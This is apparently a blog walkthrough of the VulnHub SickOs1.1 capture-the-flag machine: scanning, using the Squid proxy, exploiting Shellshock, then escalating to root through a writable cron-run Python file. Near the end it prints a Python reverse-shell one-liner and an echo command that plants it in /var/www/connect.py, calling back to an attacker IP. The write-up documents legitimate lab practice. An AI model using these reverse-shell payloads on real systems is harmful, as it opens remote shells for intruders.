VulnHub – SickOs1.1
As I’m waiting for my OSCP exam, and my LAB time there is over, I took a trip to VulnHub to see if they had any new VM that looked interesting.
Name........: SickOs1.1 Date Release: 11 Dec 2015 Author......: D4rk Series......: SickOs Objective...: Get /root/a0216ea4d51874464078c618298b1367.txt Tester(s)...: h1tch1 Twitter.....: https://twitter.com/D4rk36
This CTF gives a clear analogy how hacking strategies can be performed on a network to compromise it in a safe environment. This vm is very similar to labs I faced in OSCP. The objective being to compromise the network/machine and gain Administrative/root privileges on them.
That sounds about right, let’s have go.
Import the VM, and booted it up, while taking a note of the VM MAC-adresse. Need to find it among all the other running machines. 🙂 and fired up a quick nmap to see what’s going on.
I immediate though about the Predictable PRNG Bruteforce SSH Exploit, but since I didn’t know any usernames yet, and it would be to simple to gain root that way, I started looking into Squid, after a little while I came up short. No promising exploit, so I started to rethink. What If I can used the squid as a proxy to reach other services on the machine.
After some fiddling around, I got the BLEHHH!!! message. Well, Guess I’m on the right track. Let’s fire up my favorite first enumeration tool for web servers. Nikto.
Notice the highlighted text. ShellShock….. This should be fun.
On a sidetrack, I did have a look at the robots.txt file, and found the Wolfcms, and there is some exploits out there, but couldn’t determent the version it was running, so I explored the shellshock first, which I guess was a smart move.
There we go, we got a limited shell. After doing some enumeration, I got lucky quite quick. Crontab is one of the first think I look for, and crontab is usually a quick win.
And even better, full rights write permission on the file. Grab python shell from http://pentestmonkey.net/
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
rewrite it to fit my need, and echo it to the file.
echo “import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\”10.0.2.214\”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\”/bin/sh\”,\”-i\”]);” > /var/www/connect.py
and from there it’s just sit an wait for your root shell 🙂
That was a quick and fun win, while waiting for the OSCP 🙂